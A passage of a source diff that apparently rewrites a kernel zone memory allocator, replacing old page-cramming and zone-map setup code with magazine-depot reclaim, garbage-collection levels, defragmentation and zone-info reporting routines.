-                       .zm_index         = zindex,
-                       .zm_page_count    = pg_count,
-                       .zm_percpu        = zone->percpu,
-                       .zm_freelist_offs = empty_freelist_offs,
-               };
+               zone_unlock(z);
 
-               for (uint32_t i = 1; i < pg_count; i++) {
-                       meta[i] = (struct zone_page_metadata){
-                               .zm_index          = zindex,
-                               .zm_page_count     = i,
-                               .zm_percpu         = zone->percpu,
-                               .zm_secondary_page = true,
-                               .zm_freelist_offs  = empty_freelist_offs,
-                       };
+               if (mode == ZONE_RECLAIM_TRIM) {
+                       zpercpu_foreach(zc, z->z_pcpu_cache) {
+                               zone_depot_trim(zc, &mags);
+                       }
+               } else {
+                       zpercpu_foreach(zc, z->z_pcpu_cache) {
+                               zone_depot_lock(zc);
+                               STAILQ_CONCAT(&mags, &zc->zc_depot);
+                               zc->zc_depot_cur = 0;
+                               zone_depot_unlock(zc);
+                       }
                }
 
-               if (!zone->permanent) {
-                       zone_randomize_freelist(zone, meta,
-                           zone->percpu ? PAGE_SIZE : size, kind, entropy_buffer);
+               zone_lock(z);
+
+               uint32_t freed = 0;
+
+               STAILQ_FOREACH(mag, &mags, zm_link) {
+                       freed += zone_reclaim_elements(z,
+                           &mag->zm_cur, mag->zm_elems);
+
+                       if (freed >= zc_free_batch_size) {
+                               z->z_elems_free_min += freed;
+                               z->z_elems_free_max += freed;
+                               z->z_elems_free += freed;
+                               zone_unlock(z);
+                               thread_yield_to_preemption();
+                               zone_lock(z);
+                               freed = 0;
+                       }
                }
-       } else {
-               if (!zone->allows_foreign || !from_foreign_range(newmem, size)) {
-                       panic("zcram_and_lock: foreign memory [%lx] being crammed is "
-                           "outside of foreign range", (uintptr_t)newmem);
+
+               if (mode == ZONE_RECLAIM_DESTROY) {
+                       zpercpu_foreach(zc, z->z_pcpu_cache) {
+                               freed += zone_reclaim_elements(z,
+                                   &zc->zc_alloc_cur, zc->zc_alloc_elems);
+                               freed += zone_reclaim_elements(z,
+                                   &zc->zc_free_cur, zc->zc_free_elems);
+                       }
+
+                       z->z_elems_free_wss = 0;
+                       z->z_elems_free_min = 0;
+                       z->z_elems_free_max = 0;
+                       z->z_contention_cur = 0;
+                       z->z_contention_wma = 0;
+               } else {
+                       z->z_elems_free_min += freed;
+                       z->z_elems_free_max += freed;
+               }
+               z->z_elems_free += freed;
+       }
+
+       for (;;) {
+               struct zone_page_metadata *meta;
+               uint32_t count, goal, freed = 0;
+
+               goal = z->z_elems_rsv;
+               if (mode == ZONE_RECLAIM_TRIM) {
+                       /*
+                        * When trimming, only free elements in excess
+                        * of the working set estimate.
+                        *
+                        * However if we are in a situation where the working
+                        * set estimate is clearly growing, ignore the estimate
+                        * as the next working set update will grow it and
+                        * we want to avoid churn.
+                        */
+                       goal = MAX(goal, MAX(z->z_elems_free_wss,
+                           z->z_elems_free - z->z_elems_free_min));
+
+                       /*
+                        * Add some slop to account for "the last partial chunk in flight"
+                        * so that we do not deplete the recirculation depot too harshly.
+                        */
+                       goal += z->z_chunk_elems / 2;
+               }
+
+               if (z->z_elems_free <= goal) {
+                       break;
                }
 
                /*
-                * We cannot support elements larger than page size for foreign
-                * memory because we put metadata on the page itself for each
-                * page of foreign memory.
+                * If we're above target, but we have no free page, then drain
+                * the recirculation depot until we get a free chunk or exhaust
+                * the depot.
                 *
-                * We need to do this in order to be able to reach the metadata
-                * when any element is freed.
+                * This is rather abrupt but also somehow will reduce
+                * fragmentation anyway, and the zone code will import
+                * over time anyway.
                 */
-               assert(!zone->percpu && !zone->permanent);
-               assert(zone_elem_size(zone) <= PAGE_SIZE - sizeof(struct zone_page_metadata));
+               while (z->z_recirc_cur) {
+                       if (z->z_recirc_cur * zc_mag_size() <= goal &&
+                           !zone_pva_is_null(z->z_pageq_empty)) {
+                               break;
+                       }
+                       if (freed >= zc_free_batch_size) {
+                               zone_unlock(z);
+                               thread_yield_to_preemption();
+                               zone_lock(z);
+                               freed = 0;
+                               /* we dropped the lock, needs to reassess */
+                               continue;
+                       }
+                       freed += zone_reclaim_recirc_magazine(z, &mags);
+               }
 
-               bzero((void *)newmem, size);
+               if (zone_pva_is_null(z->z_pageq_empty)) {
+                       break;
+               }
 
-               for (vm_offset_t offs = 0; offs < size; offs += PAGE_SIZE) {
-                       meta = (struct zone_page_metadata *)(newmem + offs);
-                       *meta = (struct zone_page_metadata){
-                               .zm_index         = zindex,
-                               .zm_page_count    = 1,
-                               .zm_freelist_offs = empty_freelist_offs,
-                       };
-                       meta->zm_foreign_cookie[0] = ZONE_FOREIGN_COOKIE;
-                       zone_randomize_freelist(zone, meta, PAGE_SIZE, kind,
-                           entropy_buffer);
+               meta  = zone_pva_to_meta(z->z_pageq_empty);
+               count = (uint32_t)ptoa(meta->zm_chunk_len) / zone_elem_size(z);
+
+               if (z->z_elems_free - count < goal) {
+                       break;
                }
+
+               zone_reclaim_chunk(z, meta, count);
        }
 
-#if VM_MAX_TAG_ZONES
-       if (__improbable(zone->tags)) {
-               assert(kind == ZONE_ADDR_NATIVE && !zone->percpu);
-               ztMemoryAdd(zone, newmem, size);
+       zone_unlock(z);
+
+       STAILQ_FOREACH_SAFE(mag, &mags, zm_link, tmp) {
+               zone_magazine_free(mag);
        }
-#endif /* VM_MAX_TAG_ZONES */
+}
 
+static void
+zone_reclam_all(zone_reclaim_mode_t mode)
+{
        /*
-        * Insert the initialized pages / metadatas into the right lists.
+        * Start with zones with VA sequester since depopulating
+        * pages will not need to allocate vm map entries for holes,
+        * which will give memory back to the system faster.
         */
-
-       lock_zone(zone);
-       assert(zone->z_self == zone);
-
-       zone->page_count += pg_count;
-       if (zone->page_count_hwm < zone->page_count) {
-               zone->page_count_hwm = zone->page_count;
+       zone_foreach(z) {
+               if (z == zc_magazine_zone) {
+                       continue;
+               }
+               if (z->z_va_sequester && z->collectable) {
+                       zone_reclaim(z, mode);
+               }
        }
-       os_atomic_add(&zones_phys_page_count, pg_count, relaxed);
 
-       if (kind == ZONE_ADDR_NATIVE) {
-               os_atomic_add(&zones_phys_page_mapped_count, pg_count, relaxed);
-               if (zone->permanent) {
-                       zone_meta_queue_push(zone, &zone->pages_intermediate, meta, kind);
-               } else {
-                       zone_meta_queue_push(zone, &zone->pages_all_free, meta, kind);
-                       zone->allfree_page_count += meta->zm_page_count;
+       zone_foreach(z) {
+               if (z == zc_magazine_zone) {
+                       continue;
                }
-               free_count = zone_elem_count(zone, size, kind);
-               zone->countfree  += free_count;
-               zone->countavail += free_count;
-       } else {
-               free_count = zone_elem_count(zone, PAGE_SIZE, kind);
-               for (vm_offset_t offs = 0; offs < size; offs += PAGE_SIZE) {
-                       meta = (struct zone_page_metadata *)(newmem + offs);
-                       zone_meta_queue_push(zone, &zone->pages_any_free_foreign, meta, kind);
-                       zone->countfree  += free_count;
-                       zone->countavail += free_count;
+               if (!z->z_va_sequester && z->collectable) {
+                       zone_reclaim(z, mode);
                }
        }
 
-       KDBG(MACHDBG_CODE(DBG_MACH_ZALLOC, ZALLOC_ZCRAM) | DBG_FUNC_END, zindex);
+       zone_reclaim(zc_magazine_zone, mode);
 }
 
 void
-zcram(zone_t zone, vm_offset_t newmem, vm_size_t size)
-{
-       zcram_and_lock(zone, newmem, size);
-       unlock_zone(zone);
-}
-
-/*
- * Fill a zone with enough memory to contain at least nelem elements.
- * Return the number of elements actually put into the zone, which may
- * be more than the caller asked for since the memory allocation is
- * rounded up to the next zone allocation size.
- */
-int
-zfill(
-       zone_t  zone,
-       int     nelem)
+zone_gc(zone_gc_level_t level)
 {
-       kern_return_t kr;
-       vm_offset_t   memory;
-
-       vm_size_t alloc_size = ptoa(zone->alloc_pages);
-       vm_size_t nalloc_inc = zone_elem_count(zone, alloc_size, ZONE_ADDR_NATIVE);
-       vm_size_t nalloc = 0, goal = MAX(0, nelem);
-       int kmaflags = KMA_KOBJECT | KMA_ZERO;
-
-       if (zone->noencrypt) {
-               kmaflags |= KMA_NOENCRYPT;
-       }
-
-       assert(!zone->allows_foreign && !zone->permanent);
+       zone_reclaim_mode_t mode;
 
-       /*
-        * Trigger jetsams via the vm_pageout_garbage_collect thread if we're
-        * running out of zone memory
-        */
-       if (is_zone_map_nearing_exhaustion()) {
-               thread_wakeup((event_t) &vm_pageout_garbage_collect);
+       switch (level) {
+       case ZONE_GC_TRIM:
+               mode = ZONE_RECLAIM_TRIM;
+               break;
+       case ZONE_GC_DRAIN:
+               mode = ZONE_RECLAIM_DRAIN;
+               break;
+       case ZONE_GC_JETSAM:
+               kill_process_in_largest_zone();
+               mode = ZONE_RECLAIM_TRIM;
+               break;
        }
 
-       if (zone->va_sequester) {
-               lock_zone(zone);
-
-               do {
-                       struct zone_page_metadata *page_meta;
-                       page_meta = zone_sequestered_page_get(zone, &memory);
-                       if (NULL == page_meta) {
-                               break;
-                       }
-                       unlock_zone(zone);
-
-                       kr = zone_sequestered_page_populate(zone, page_meta,
-                           memory, alloc_size, kmaflags);
-                       if (KERN_SUCCESS != kr) {
-                               goto out_nolock;
-                       }
-
-                       zcram_and_lock(zone, memory, alloc_size);
-                       nalloc += nalloc_inc;
-               } while (nalloc < goal);
-
-               unlock_zone(zone);
-       }
+       current_thread()->options |= TH_OPT_ZONE_PRIV;
+       lck_mtx_lock(&zone_gc_lock);
 
-out_nolock:
-       while (nalloc < goal) {
-               kr = kernel_memory_allocate(submap_for_zone(zone), &memory,
-                   alloc_size, 0, kmaflags, VM_KERN_MEMORY_ZONE);
-               if (kr != KERN_SUCCESS) {
-                       printf("%s: kernel_memory_allocate() of %lu bytes failed\n",
-                           __func__, (unsigned long)(nalloc * alloc_size));
-                       break;
-               }
+       zone_reclam_all(mode);
 
-               zcram(zone, memory, alloc_size);
-               nalloc += nalloc_inc;
+       if (level == ZONE_GC_JETSAM && zone_map_nearing_exhaustion()) {
+               /*
+                * If we possibly killed a process, but we're still critical,
+                * we need to drain harder.
+                */
+               zone_reclam_all(ZONE_RECLAIM_DRAIN);
        }
 
-       return (int)nalloc;
+       lck_mtx_unlock(&zone_gc_lock);
+       current_thread()->options &= ~TH_OPT_ZONE_PRIV;
 }
 
-/*
- * We're being very conservative here and picking a value of 95%. We might need to lower this if
- * we find that we're not catching the problem and are still hitting zone map exhaustion panics.
- */
-#define ZONE_MAP_JETSAM_LIMIT_DEFAULT 95
-
-/*
- * Trigger zone-map-exhaustion jetsams if the zone map is X% full, where X=zone_map_jetsam_limit.
- * Can be set via boot-arg "zone_map_jetsam_limit". Set to 95% by default.
- */
-TUNABLE_WRITEABLE(unsigned int, zone_map_jetsam_limit, "zone_map_jetsam_limit",
-    ZONE_MAP_JETSAM_LIMIT_DEFAULT);
-
 void
-get_zone_map_size(uint64_t *current_size, uint64_t *capacity)
+zone_gc_trim(void)
 {
-       vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed);
-       *current_size = ptoa_64(phys_pages);
-       *capacity = zone_phys_mapped_max;
+       zone_gc(ZONE_GC_TRIM);
 }
 
 void
-get_largest_zone_info(char *zone_name, size_t zone_name_len, uint64_t *zone_size)
+zone_gc_drain(void)
 {
-       zone_t largest_zone = zone_find_largest();
-
-       /*
-        * Append kalloc heap name to zone name (if zone is used by kalloc)
-        */
-       snprintf(zone_name, zone_name_len, "%s%s",
-           zone_heap_name(largest_zone), largest_zone->z_name);
-
-       *zone_size = zone_size_wired(largest_zone);
+       zone_gc(ZONE_GC_DRAIN);
 }
 
-boolean_t
-is_zone_map_nearing_exhaustion(void)
+static bool
+zone_defrag_needed(zone_t z)
 {
-       vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed);
-       return ptoa_64(phys_pages) > (zone_phys_mapped_max * zone_map_jetsam_limit) / 100;
-}
-
+       uint32_t recirc_size = z->z_recirc_cur * zc_mag_size();
 
-#define VMENTRY_TO_VMOBJECT_COMPARISON_RATIO 98
+       if (recirc_size <= z->z_chunk_elems / 2) {
+               return false;
+       }
+       return recirc_size * zc_defrag_ratio > z->z_elems_free_wss * 100;
+}
 
-/*
- * Tries to kill a single process if it can attribute one to the largest zone. If not, wakes up the memorystatus thread
- * to walk through the jetsam priority bands and kill processes.
+/*!
+ * @function zone_defrag_async
+ *
+ * @brief
+ * Resize the recirculation depot to match the working set size.
+ *
+ * @discussion
+ * When zones grow very large due to a spike in usage, and then some of those
+ * elements get freed, the elements in magazines in the recirculation depot
+ * are in no particular order.
+ *
+ * In order to control fragmentation, we need to detect "empty" pages so that
+ * they get onto the @c z_pageq_empty freelist, so that allocations re-pack
+ * naturally.
+ *
+ * This is done very gently, never in excess of the working set and some slop.
  */
 static void
-kill_process_in_largest_zone(void)
+zone_defrag_async(__unused thread_call_param_t p0, __unused thread_call_param_t p1)
 {
-       pid_t pid = -1;
-       zone_t largest_zone = zone_find_largest();
+       zone_foreach(z) {
+               struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags);
+               zone_magazine_t mag, tmp;
+               uint32_t freed = 0, goal = 0;
 
-       printf("zone_map_exhaustion: Zone mapped %lld of %lld, used %lld, map size %lld, capacity %lld [jetsam limit %d%%]\n",
-           ptoa_64(os_atomic_load(&zones_phys_page_mapped_count, relaxed)), ptoa_64(zone_phys_mapped_max),
-           ptoa_64(os_atomic_load(&zones_phys_page_count, relaxed)),
-           (uint64_t)zone_submaps_approx_size(),
-           (uint64_t)zone_range_size(&zone_info.zi_map_range),
-           zone_map_jetsam_limit);
-       printf("zone_map_exhaustion: Largest zone %s%s, size %lu\n", zone_heap_name(largest_zone),
-           largest_zone->z_name, (uintptr_t)zone_size_wired(largest_zone));
+               if (!z->collectable || !zone_defrag_needed(z)) {
+                       continue;
+               }
 
-       /*
-        * We want to make sure we don't call this function from userspace.
-        * Or we could end up trying to synchronously kill the process
-        * whose context we're in, causing the system to hang.
-        */
-       assert(current_task() == kernel_task);
+               zone_lock(z);
 
-       /*
-        * If vm_object_zone is the largest, check to see if the number of
-        * elements in vm_map_entry_zone is comparable.
-        *
-        * If so, consider vm_map_entry_zone as the largest. This lets us target
-        * a specific process to jetsam to quickly recover from the zone map
-        * bloat.
-        */
-       if (largest_zone == vm_object_zone) {
-               unsigned int vm_object_zone_count = zone_count_allocated(vm_object_zone);
-               unsigned int vm_map_entry_zone_count = zone_count_allocated(vm_map_entry_zone);
-               /* Is the VM map entries zone count >= 98% of the VM objects zone count? */
-               if (vm_map_entry_zone_count >= ((vm_object_zone_count * VMENTRY_TO_VMOBJECT_COMPARISON_RATIO) / 100)) {
-                       largest_zone = vm_map_entry_zone;
-                       printf("zone_map_exhaustion: Picking VM map entries as the zone to target, size %lu\n",
-                           (uintptr_t)zone_size_wired(largest_zone));
+               goal = z->z_elems_free_wss + z->z_chunk_elems / 2 +
+                   zc_mag_size() - 1;
+
+               while (z->z_recirc_cur * zc_mag_size() > goal) {
+                       if (freed >= zc_free_batch_size) {
+                               zone_unlock(z);
+                               thread_yield_to_preemption();
+                               zone_lock(z);
+                               freed = 0;
+                               /* we dropped the lock, needs to reassess */
+                               continue;
+                       }
+                       freed += zone_reclaim_recirc_magazine(z, &mags);
                }
-       }
 
-       /* TODO: Extend this to check for the largest process in other zones as well. */
-       if (largest_zone == vm_map_entry_zone) {
-               pid = find_largest_process_vm_map_entries();
-       } else {
-               printf("zone_map_exhaustion: Nothing to do for the largest zone [%s%s]. "
-                   "Waking up memorystatus thread.\n", zone_heap_name(largest_zone),
-                   largest_zone->z_name);
-       }
-       if (!memorystatus_kill_on_zone_map_exhaustion(pid)) {
-               printf("zone_map_exhaustion: Call to memorystatus failed, victim pid: %d\n", pid);
+               zone_unlock(z);
+
+               STAILQ_FOREACH_SAFE(mag, &mags, zm_link, tmp) {
+                       zone_magazine_free(mag);
+               }
        }
 }
 
-#pragma mark zalloc module init
-
-/*
- *     Initialize the "zone of zones" which uses fixed memory allocated
- *     earlier in memory initialization.  zone_bootstrap is called
- *     before zone_init.
- */
-__startup_func
 void
-zone_bootstrap(void)
+compute_zone_working_set_size(__unused void *param)
 {
-       /* Validate struct zone_page_metadata expectations */
-       if ((1U << ZONE_PAGECOUNT_BITS) <
-           atop(ZONE_MAX_ALLOC_SIZE) * sizeof(struct zone_page_metadata)) {
-               panic("ZONE_PAGECOUNT_BITS is not large enough to hold page counts");
-       }
+       uint32_t zc_auto = zc_auto_threshold;
+       bool kick_defrag = false;
 
-       /* Validate struct zone_packed_virtual_address expectations */
-       static_assert((intptr_t)VM_MIN_KERNEL_ADDRESS < 0, "the top bit must be 1");
-       if (VM_KERNEL_POINTER_SIGNIFICANT_BITS - PAGE_SHIFT > 31) {
-               panic("zone_pva_t can't pack a kernel page address in 31 bits");
+       /*
+        * Keep zone caching disabled until the first proc is made.
+        */
+       if (__improbable(zone_caching_disabled < 0)) {
+               return;
        }
 
-       zpercpu_early_count = ml_early_cpu_max_number() + 1;
-
-       /* Set up zone element poisoning */
-       zp_bootstrap();
+       zone_caching_disabled = vm_pool_low();
+#if ZALLOC_EARLY_GAPS
+       zone_cleanup_early_gaps_if_needed();
+#endif
 
-       random_bool_init(&zone_bool_gen);
+       if (os_mul_overflow(zc_auto, Z_CONTENTION_WMA_UNIT, &zc_auto)) {
+               zc_auto = 0;
+       }
 
-       /*
-        * the KASAN quarantine for kalloc doesn't understand heaps
-        * and trips the heap confusion panics. At the end of the day,
-        * all these security measures are double duty with KASAN.
-        *
-        * On 32bit kernels, these protections are just too expensive.
-        */
-#if !defined(__LP64__) || KASAN_ZALLOC
-       zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER;
-       zsecurity_options &= ~ZSECURITY_OPTIONS_SUBMAP_USER_DATA;
-       zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER_KEXT_KALLOC;
-#endif
+       zone_foreach(z) {
+               uint32_t wma;
+               bool needs_caching = false;
 
-       thread_call_setup(&call_async_alloc, zalloc_async, NULL);
+               if (z->z_self != z) {
+                       continue;
+               }
 
-#if CONFIG_ZCACHE
-       /* zcc_enable_for_zone_name=<zone>: enable per-cpu zone caching for <zone>. */
-       if (PE_parse_boot_arg_str("zcc_enable_for_zone_name", cache_zone_name, sizeof(cache_zone_name))) {
-               printf("zcache: caching enabled for zone %s\n", cache_zone_name);
-       }
-#endif /* CONFIG_ZCACHE */
-}
+               zone_lock(z);
 
-#if __LP64__
-#if CONFIG_EMBEDDED
-#define ZONE_MAP_VIRTUAL_SIZE_LP64      (32ULL * 1024ULL * 1024 * 1024)
-#else
-#define ZONE_MAP_VIRTUAL_SIZE_LP64      (128ULL * 1024ULL * 1024 * 1024)
-#endif
-#endif /* __LP64__ */
+               wma = z->z_elems_free_max - z->z_elems_free_min;
+               wma = (3 * wma + z->z_elems_free_wss) / 4;
+               z->z_elems_free_max = z->z_elems_free_min = z->z_elems_free;
+               z->z_elems_free_wss = wma;
 
-#define SINGLE_GUARD                    16384
-#define MULTI_GUARD                     (3 * SINGLE_GUARD)
+               if (!kick_defrag && zone_defrag_needed(z)) {
+                       kick_defrag = true;
+               }
 
-#if __LP64__
-static inline vm_offset_t
-zone_restricted_va_max(void)
-{
-       vm_offset_t compressor_max = VM_PACKING_MAX_PACKABLE(C_SLOT_PACKED_PTR);
-       vm_offset_t vm_page_max    = VM_PACKING_MAX_PACKABLE(VM_PAGE_PACKED_PTR);
+               /* fixed point decimal of contentions per second */
+               wma = z->z_contention_cur * Z_CONTENTION_WMA_UNIT /
+                   ZONE_WSS_UPDATE_PERIOD;
+               z->z_contention_cur = 0;
+               z->z_contention_wma = (3 * wma + z->z_contention_wma) / 4;
 
-       return trunc_page(MIN(compressor_max, vm_page_max));
-}
-#endif
+               /*
+                * If the zone seems to be very quiet,
+                * gently lower its cpu-local depot size.
+                */
+               if (z->z_pcpu_cache && wma < Z_CONTENTION_WMA_UNIT / 2 &&
+                   z->z_contention_wma < Z_CONTENTION_WMA_UNIT / 2) {
+                       zpercpu_foreach(zc, z->z_pcpu_cache) {
+                               if (zc->zc_depot_max > zc_mag_size()) {
+                                       zc->zc_depot_max--;
+                               }
+                       }
+               }
 
-__startup_func
-static void
-zone_tunables_fixup(void)
-{
-       if (zone_map_jetsam_limit == 0 || zone_map_jetsam_limit > 100) {
-               zone_map_jetsam_limit = ZONE_MAP_JETSAM_LIMIT_DEFAULT;
-       }
-}
-STARTUP(TUNABLES, STARTUP_RANK_MIDDLE, zone_tunables_fixup);
+               /*
+                * If the zone has been contending like crazy for two periods,
+                * and is eligible, maybe it's time to enable caching.
+                */
+               if (!z->z_nocaching && !z->z_pcpu_cache && !z->exhaustible &&
+                   zc_auto && z->z_contention_wma >= zc_auto && wma >= zc_auto) {
+                       needs_caching = true;
+               }
 
-__startup_func
-static vm_size_t
-zone_phys_size_max(void)
-{
-       mach_vm_size_t zsize;
-       vm_size_t zsizearg;
+               zone_unlock(z);
 
-       if (PE_parse_boot_argn("zsize", &zsizearg, sizeof(zsizearg))) {
-               zsize = zsizearg * (1024ULL * 1024);
-       } else {
-               zsize = sane_size >> 2;         /* Set target zone size as 1/4 of physical memory */
-#if defined(__LP64__)
-               zsize += zsize >> 1;
-#endif /* __LP64__ */
+               if (needs_caching) {
+                       zone_enable_caching(z);
+               }
        }
 
-       if (zsize < CONFIG_ZONE_MAP_MIN) {
-               zsize = CONFIG_ZONE_MAP_MIN;   /* Clamp to min */
-       }
-       if (zsize > sane_size >> 1) {
-               zsize = sane_size >> 1; /* Clamp to half of RAM max */
-       }
-       if (zsizearg == 0 && zsize > ZONE_MAP_MAX) {
-               /* if zsize boot-arg not present and zsize exceeds platform maximum, clip zsize */
-               vm_size_t orig_zsize = zsize;
-               zsize = ZONE_MAP_MAX;
-               printf("NOTE: zonemap size reduced from 0x%lx to 0x%lx\n",
-                   (uintptr_t)orig_zsize, (uintptr_t)zsize);
+       if (kick_defrag) {
+               thread_call_enter(&zone_defrag_callout);
        }
-
-       assert((vm_size_t) zsize == zsize);
-       return (vm_size_t)trunc_page(zsize);
 }
 
-__startup_func
-static struct zone_map_range
-zone_init_allocate_va(vm_offset_t *submap_min, vm_size_t size, bool guard)
+#endif /* !ZALLOC_TEST */
+#pragma mark vm integration, MIG routines
+#if !ZALLOC_TEST
+
+/*
+ * Creates a vm_map_copy_t to return to the caller of mach_* MIG calls
+ * requesting zone information.
+ * Frees unused pages towards the end of the region, and zero'es out unused
+ * space on the last page.
+ */
+static vm_map_copy_t
+create_vm_map_copy(
+       vm_offset_t             start_addr,
+       vm_size_t               total_size,
+       vm_size_t               used_size)
 {
-       struct zone_map_range r;
-       kern_return_t kr;
+       kern_return_t   kr;
+       vm_offset_t             end_addr;
+       vm_size_t               free_size;
+       vm_map_copy_t   copy;
 
-       if (guard) {
-               vm_map_offset_t addr = *submap_min;
-               vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
+       if (used_size != total_size) {
+               end_addr = start_addr + used_size;
+               free_size = total_size - (round_page(end_addr) - start_addr);
 
-               vmk_flags.vmkf_permanent = TRUE;
-               kr = vm_map_enter(kernel_map, &addr, size, 0,
-                   VM_FLAGS_FIXED, vmk_flags, VM_KERN_MEMORY_ZONE, kernel_object,
-                   0, FALSE, VM_PROT_NONE, VM_PROT_NONE, VM_INHERIT_DEFAULT);
-               *submap_min = (vm_offset_t)addr;
-       } else {
-               kr = kernel_memory_allocate(kernel_map, submap_min, size,
-                   0, KMA_KOBJECT | KMA_PAGEABLE | KMA_VAONLY, VM_KERN_MEMORY_ZONE);
-       }
-       if (kr != KERN_SUCCESS) {
-               panic("zone_init_allocate_va(0x%lx:0x%zx) failed: %d",
-                   (uintptr_t)*submap_min, (size_t)size, kr);
+               if (free_size >= PAGE_SIZE) {
+                       kmem_free(ipc_kernel_map,
+                           round_page(end_addr), free_size);
+               }
+               bzero((char *) end_addr, round_page(end_addr) - end_addr);
        }
 
-       r.min_address = *submap_min;
-       *submap_min  += size;
-       r.max_address = *submap_min;
+       kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)start_addr,
+           (vm_map_size_t)used_size, TRUE, &copy);
+       assert(kr == KERN_SUCCESS);
 
-       return r;
+       return copy;
 }
 
-__startup_func
-static void
-zone_submap_init(
-       vm_offset_t *submap_min,
-       unsigned    idx,
-       uint64_t    zone_sub_map_numer,
-       uint64_t    *remaining_denom,
-       vm_offset_t *remaining_size,
-       vm_size_t   guard_size)
+static boolean_t
+get_zone_info(
+       zone_t                   z,
+       mach_zone_name_t        *zn,
+       mach_zone_info_t        *zi)
 {
-       vm_offset_t submap_start, submap_end;
-       vm_size_t submap_size;
-       vm_map_t  submap;
-       kern_return_t kr;
-
-       submap_size = trunc_page(zone_sub_map_numer * *remaining_size /
-           *remaining_denom);
-       submap_start = *submap_min;
-       submap_end = submap_start + submap_size;
+       struct zone zcopy;
+       vm_size_t cached = 0;
 
-#if defined(__LP64__)
-       if (idx == Z_SUBMAP_IDX_VA_RESTRICTED_MAP) {
-               vm_offset_t restricted_va_max = zone_restricted_va_max();
-               if (submap_end > restricted_va_max) {
-#if DEBUG || DEVELOPMENT
-                       printf("zone_init: submap[%d] clipped to %zdM of %zdM\n", idx,
-                           (size_t)(restricted_va_max - submap_start) >> 20,
-                           (size_t)submap_size >> 20);
-#endif /* DEBUG || DEVELOPMENT */
-                       guard_size += submap_end - restricted_va_max;
-                       *remaining_size -= submap_end - restricted_va_max;
-                       submap_end  = restricted_va_max;
-                       submap_size = restricted_va_max - submap_start;
+       assert(z != ZONE_NULL);
+       zone_lock(z);
+       if (!z->z_self) {
+               zone_unlock(z);
+               return FALSE;
+       }
+       zcopy = *z;
+       if (z->z_pcpu_cache) {
+               zpercpu_foreach(zc, z->z_pcpu_cache) {
+                       cached += zc->zc_alloc_cur + zc->zc_free_cur;
+                       cached += zc->zc_depot_cur * zc_mag_size();
                }
-
-               vm_packing_verify_range("vm_compressor",
-                   submap_start, submap_end, VM_PACKING_PARAMS(C_SLOT_PACKED_PTR));
-               vm_packing_verify_range("vm_page",
-                   submap_start, submap_end, VM_PACKING_PARAMS(VM_PAGE_PACKED_PTR));
        }
-#endif /* defined(__LP64__) */
+       zone_unlock(z);
 
-       vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
-       vmk_flags.vmkf_permanent = TRUE;
-       kr = kmem_suballoc(kernel_map, submap_min, submap_size,
-           FALSE, VM_FLAGS_FIXED, vmk_flags,
-           VM_KERN_MEMORY_ZONE, &submap);
-       if (kr != KERN_SUCCESS) {
-               panic("kmem_suballoc(kernel_map[%d] %p:%p) failed: %d",
-                   idx, (void *)submap_start, (void *)submap_end, kr);
-       }
+       if (zn != NULL) {
+               /*
+                * Append kalloc heap name to zone name (if zone is used by kalloc)
+                */
+               char temp_zone_name[MAX_ZONE_NAME] = "";
+               snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s",
+                   zone_heap_name(z), z->z_name);
 
-#if DEBUG || DEVELOPMENT
-       printf("zone_init: submap[%d] %p:%p (%zuM)\n",
-           idx, (void *)submap_start, (void *)submap_end,
-           (size_t)submap_size >> 20);
-#endif /* DEBUG || DEVELOPMENT */
+               /* assuming here the name data is static */
+               (void) __nosan_strlcpy(zn->mzn_name, temp_zone_name,
+                   strlen(temp_zone_name) + 1);
+       }
 
-       zone_submaps[idx] = submap;
-       *submap_min       = submap_end;
-       *remaining_size  -= submap_size;
-       *remaining_denom -= zone_sub_map_numer;
+       if (zi != NULL) {
+               *zi = (mach_zone_info_t) {
+                       .mzi_count = zone_count_allocated(&zcopy) - cached,
+                       .mzi_cur_size = ptoa_64(zone_scale_for_percpu(&zcopy, zcopy.z_wired_cur)),
+                       // max_size for zprint is now high-watermark of pages used
+                       .mzi_max_size = ptoa_64(zone_scale_for_percpu(&zcopy, zcopy.z_wired_hwm)),
+                       .mzi_elem_size = zone_scale_for_percpu(&zcopy, zcopy.z_elem_size),
+                       .mzi_alloc_size = ptoa_64(zcopy.z_chunk_pages),
+                       .mzi_exhaustible = (uint64_t)zcopy.exhaustible,
+               };
+               zpercpu_foreach(zs, zcopy.z_stats) {
+                       zi->mzi_sum_size += zs->zs_mem_allocated;
+               }
+               if (zcopy.collectable) {
+                       SET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable,
+                           ptoa_64(zone_scale_for_percpu(&zcopy, zcopy.z_wired_empty)));
+                       SET_MZI_COLLECTABLE_FLAG(zi->mzi_collectable, TRUE);
+               }
+       }
 
-       zone_init_allocate_va(submap_min, guard_size, true);
+       return TRUE;
 }
 
-/* Global initialization of Zone Allocator.
- * Runs after zone_bootstrap.
- */
-__startup_func
-static void
-zone_init(void)
+kern_return_t
+task_zone_info(
+       __unused task_t                                 task,
+       __unused mach_zone_name_array_t *namesp,
+       __unused mach_msg_type_number_t *namesCntp,
+       __unused task_zone_info_array_t *infop,
+       __unused mach_msg_type_number_t *infoCntp)
 {
-       vm_size_t       zone_meta_size;
-       vm_size_t       zone_map_size;
-       vm_size_t       remaining_size;
-       vm_offset_t     submap_min = 0;
-
-       if (ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) {
-               zone_last_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES_MAP;
-       } else {
-               zone_last_submap_idx = Z_SUBMAP_IDX_GENERAL_MAP;
-       }
-       zone_phys_mapped_max  = zone_phys_size_max();
+       return KERN_FAILURE;
+}
 
-#if __LP64__
-       zone_map_size = ZONE_MAP_VIRTUAL_SIZE_LP64;
-#else
-       zone_map_size = zone_phys_mapped_max;
-#endif
-       zone_meta_size = round_page(atop(zone_map_size) *
-           sizeof(struct zone_page_metadata));
+kern_return_t
+mach_zone_info(
+       host_priv_t             host,
+       mach_zone_name_array_t  *namesp,
+       mach_msg_type_number_t  *namesCntp,
+       mach_zone_info_array_t  *infop,
+       mach_msg_type_number_t  *infoCntp)
+{
